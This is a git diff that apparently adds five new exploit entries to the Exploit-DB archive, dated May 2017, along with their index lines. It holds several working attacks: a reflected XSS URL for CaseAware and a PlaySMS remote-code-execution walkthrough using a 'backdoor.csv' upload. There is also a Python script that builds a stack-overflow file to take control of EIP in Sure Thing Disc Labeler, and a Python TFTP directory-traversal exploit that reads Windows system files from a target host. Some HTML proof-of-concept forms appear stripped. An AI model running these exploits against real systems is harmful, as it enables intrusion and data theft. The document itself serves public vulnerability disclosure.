diff --git a/files.csv b/files.csv index 177619fa7..2f86dbeaf 100644 --- a/files.csv +++ b/files.csv @@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port 42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0 42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0 42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0 +42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port 42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80 42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0 42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 +42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port 42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0 42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80 42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0 +42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0 +42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0 +42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0 diff --git a/platforms/php/webapps/42042.txt b/platforms/php/webapps/42042.txt new file mode 100755 index 000000000..69807c2a6 --- /dev/null +++ b/platforms/php/webapps/42042.txt @@ -0,0 +1,27 @@ +# Exploit Title: CaseAware Cross Site Scripting Vulnerability +# Date: 20th May 2017 +# Exploit Author: justpentest +# Vendor Homepage: https://caseaware.com/ +# Version: All the versions +# Contact: transform2secure@gmail.com +# CVE : 2017-5631 + +Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle + +1) Description: +An issue with respect to input sanitization was discovered in KMCIS +CaseAware. Reflected cross site scripting is present in the user parameter +(i.e., "usr") that is transmitted in the login.php query string. So +bascially username parameter is vulnerable to XSS. + +2) Exploit: + +https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'>Click_ME<' +---------------------------------------------------------------------------------------- + +3) References: + +https://www.openbugbounty.org/incidents/228262/ +https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle + diff --git a/platforms/php/webapps/42043.txt b/platforms/php/webapps/42043.txt new file mode 100755 index 000000000..5fa42139b --- /dev/null +++ b/platforms/php/webapps/42043.txt @@ -0,0 +1,109 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt +[+] ISR: ApparitionSec + + + +Vendor: +================ +www.mantisbt.org + + + +Product: +========= +Mantis Bug Tracker +1.3.10 / v2.3.0 + + +MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. + + + +Vulnerability Type: +======================== +CSRF Permalink Injection + + + +CVE Reference: +============== +CVE-2017-7620 + + + +Security Issue: +================ +Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage. + +Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes. +Line: 270 + +# Check for URL's pointing to other domains + +if( 0 == $t_type || empty( $t_matches['script'] ) || + + 3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) { + + + + return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php'; + +} + + + +# Start extracting regex matches + +$t_script = $t_matches['script']; +$t_script_path = $t_matches['path']; + + + + +Exploit/POC: +============= +
+ +
+ +OR + +
+ +
+ + + +Network Access: +=============== +Remote + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: April 9, 2017 +Vendor Release Fix: May 15, 2017 +Vendor Disclosed: May 20, 2017 +May 20, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42044.txt b/platforms/php/webapps/42044.txt new file mode 100755 index 000000000..ef0e2847e --- /dev/null +++ b/platforms/php/webapps/42044.txt @@ -0,0 +1,128 @@ +# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php +# Date: 21-05-2017 +# Software Link: https://playsms.org/download/ +# Version: 1.4 +# Exploit Author: Touhid M.Shaikh +# Contact: http://twitter.com/touhidshaikh22 +# Website: http://touhidshaikh.com/ +# Category: webapps + +1. Description + +Code Execution using import.php + + We know import.php accept file and just read content + not stored in server. But when we stored payload in our backdoor.csv + and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly . + + In My case i stored my vulnerable code in my backdoor.csv files's Name field . + + But There is one problem in execution. Its only execute in built function and variable which is used in application. + + That why the server not execute our payload directly. Now i Use "" in name field and change our user agent to any command which u want to execute command. Bcz it not execute directly . + +Example of my backdoor.csv file content +----------------------MY FILE CONTENT------------------------------------ +Name Mobile Email Group code Tags + 22 + +--------------------MY FILE CONTENT END HERE------------------------------- + + + + For More Details : www.touhidshaikh.com/blog/ + + For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE + + +2. Proof of Concept + +Login as regular user (created user using index.php?app=main&inc=core_auth&route=register): + +Go to : +http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list + + +And Upload my malicious File.(backdoor.csv) +and change our User agent. + + + This is Form For Upload Phonebook. +----------------------Form for upload CSV file ---------------------- +
+" . _CSRF_FORM_ . " +

" . _('Please select CSV file for phonebook entries') . "

+

+

" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "

+

+
+------------------------------Form ends --------------------------- + + + +-------------Read Content and Display Content----------------------- + + case "import": + $fnpb = $_FILES['fnpb']; + $fnpb_tmpname = $_FILES['fnpb']['tmp_name']; + $content = " +

" . _('Phonebook') . "

+

" . _('Import confirmation') . "

+
+ + + + + + + + + "; + if (file_exists($fnpb_tmpname)) { + $session_import = 'phonebook_' . _PID_; + unset($_SESSION['tmp'][$session_import]); + ini_set('auto_detect_line_endings', TRUE); + if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) { + $i = 0; + while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) { + if ($i > $phonebook_row_limit) { + break; + } + if ($i > 0) { + $contacts[$i] = $c_contact; + } + $i++; + } + $i = 0; + foreach ($contacts as $contact) { + $c_gid = phonebook_groupcode2id($uid, $contact[3]); + if (!$c_gid) { + $contact[3] = ''; + } + $contact[1] = sendsms_getvalidnumber($contact[1]); + $contact[4] = phonebook_tags_clean($contact[4]); + if ($contact[0] && $contact[1]) { + $i++; + $content .= " + + + + + + + + "; + $k = $i - 1; + $_SESSION['tmp'][$session_import][$k] = $contact; + } + } + +------------------------------code ends --------------------------- + + +Bingoo..... + + +*------------------My Friends---------------------------* +|Pratik K.Tejani, Rehman, Taushif,Charles Babbage | +*---------------------------------------------------* \ No newline at end of file diff --git a/platforms/windows/dos/42040.py b/platforms/windows/dos/42040.py new file mode 100755 index 000000000..64a51e834 --- /dev/null +++ b/platforms/windows/dos/42040.py @@ -0,0 +1,33 @@ +# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC) +# Date: 5-19-17 +# Exploit Author: Chance Johnson (albatross@loftwing.net) +# Vendor Homepage: http://www.surething.com/ +# Software Link: http://www.surething.com/disclabeler +# Version: 6.2.138.0 +# Tested on: Windows 7 x64 / Windows 10 +# +# Usage: +# Open the project template generated by this script. +# If a readable address is placed in AVread, no exception will be thrown +# and a return pointer will be overwritten giving control over EIP when +# the function returns. + +header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00' +header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62' +header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35' +header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41' +header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63' + +junk1 = 'D'*10968 +EIP = 'A'*4 # Direct RET overwrite +junk2 = 'D'*24 +AVread = 'B'*4 # address of any readable memory +junk3 = 'D'*105693 + +buf = header + junk1 + EIP + junk2 + AVread + junk3 + +print "[+] Creating file with %d bytes..." % len(buf) + +f=open("exp.std",'wb') +f.write(buf) +f.close() diff --git a/platforms/windows/remote/42041.txt b/platforms/windows/remote/42041.txt new file mode 100755 index 000000000..295135634 --- /dev/null +++ b/platforms/windows/remote/42041.txt @@ -0,0 +1,99 @@ +[+] Credits: John Page aka HYP3RLINX +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt +[+] ISR: ApparitionSec + + + +Vendor: +==================== +www.secure-bytes.com + + + +Product: +===================== +Secure Auditor - v3.0 + +Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases +and Cisco devices. + + + +Vulnerability Type: +=================== +Directory Traversal + + + +CVE Reference: +============== +CVE-2017-9024 + + + +Security Issue: +================ +Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a +Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. + + + + +Exploit/POC: +============= +import sys,socket + +print 'Secure Auditor v3.0 / Cisco Config Manager' +print 'TFTP Directory Traversal Exploit' +print 'Read ../../../../Windows/system.ini POC' +print 'hyp3rlinx' + +HOST = raw_input("[IP]> ") +FILE = '../../../../Windows/system.ini' +PORT = 69 + +PAYLOAD = "\x00\x01" #TFTP Read +PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal +PAYLOAD += "netascii\x00" #TFTP Type + +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +s.sendto(PAYLOAD, (HOST, PORT)) +out = s.recv(1024) +s.close() + +print "Victim Data located on : %s " %(HOST) +print out.strip() + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================== +Vendor Notification: May 10, 2017 +No replies +May 20, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file
*" . _('Name') . "" . _('Mobile') . "" . _('Email') . "" . _('Group code') . "" . _('Tags') . "
$i.$contact[0]$contact[1]$contact[2]$contact[3]$contact[4]